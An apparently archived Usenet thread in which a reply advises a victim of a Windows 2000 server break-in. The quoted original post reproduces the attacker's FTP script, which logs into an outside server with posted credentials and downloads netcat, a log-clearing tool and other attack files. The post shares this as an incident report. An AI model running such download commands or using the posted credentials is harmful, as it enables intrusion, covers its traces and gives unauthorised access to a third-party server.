first, microsoft is not law enforcement, so they can't 'bring this douche
bag to justice' as you put it. that is a job for your police or the fbi if
it was interstate. but unless you can document some monetary damage you are
unlikely to get their attention.
second, microsoft will just tell you to run all the current updates, secure
your server according to their suggestions, run a virus scanner, and you
will be secure. unless you can show that you have done everything on their
lists and still got hacked they probably won't be interested. from the
looks of it you have something wide open if someone could get in and run an
ftp script on your machine with enough privileges to do what they did.
third, expect lots more virus laden mail now that you have used your real
mail address to post to this forum. swen and other viruses harvest
addresses here to mail themselves to you.
"K.A." <(E-Mail Removed)> wrote in message
news:YR5kc.33886$(E-Mail Removed)...
> Folks,
>
> Yesterday, a douche bag managed to hack my Windows 2000 server. The
hacker
> managed to upload some setup files to system32\setup folder. In the setup
> folder, he uploaded some scripts. Using the scripts, the hacker
downloaded
> a few files from his FTP server. He managed to install three Windows
> services.
>
> 1. Windows logon service (Sounds pretty standard Windows 2000 service).
The
> program, netstart.exe runs from system32\setup folder.
> 2. TCP-IP (Sounds normal enough). The program runs from system32\setup
> folder.
> 3. ****-U (This one is not so normal). The program runs from
system32\setup
> folder.
>
> He also managed to erase my event logs. I have no idea what damage he has
> already done. However, I managed to find his foot steps in time. I now
> know his IP address, the user id and password to his FTP server. I tried
to
> report to Microsoft. I wanted to report the incident to Microsoft, so
that
> they can find out, how the hacker hacked my server, and close any other
> vulnerabilities Windows 2000 has. Apparently, Bill (Gate that is) is
still
> not serious enough about the security. The call went to India. They
wanted
> to return my call in 3-5 business days. I insisted on talking to someone
> higher-up. I got a guy named, Mike, who spoke with Russel Crowe's accent
> and asked me to report this incident to local law enforcement authority.
As
> much a law abiding citizen I am, I know that my local law enforcement will
> look at me nothing more than a looney tune. Anyway, folks, here is the
> douche bag's FTP server, user id, and password.
>
> This is the script the hacker ran. Note that the ftp server at port
34816.
> open 207.67.216.49 34816
> scanner2004
> nrg-x-crew
> binary
> lcd C:\winnt\system32\setup
> get regsvr32.dll
> get TzoLibr.dll
> get netstart.exe
> get space.txt
> get readme.txt
> get liesmich.txt
> get clearlogs.exe
> get syslog.exe
> get syslog.ini
> get install.cmd
> get nc.exe
> quit
>
> I am posting to save some of you the aggravation, I went through, and
bring
> this douche bag to justice.
>
> Regards.
>
> A
>
>
|
Similar Threads
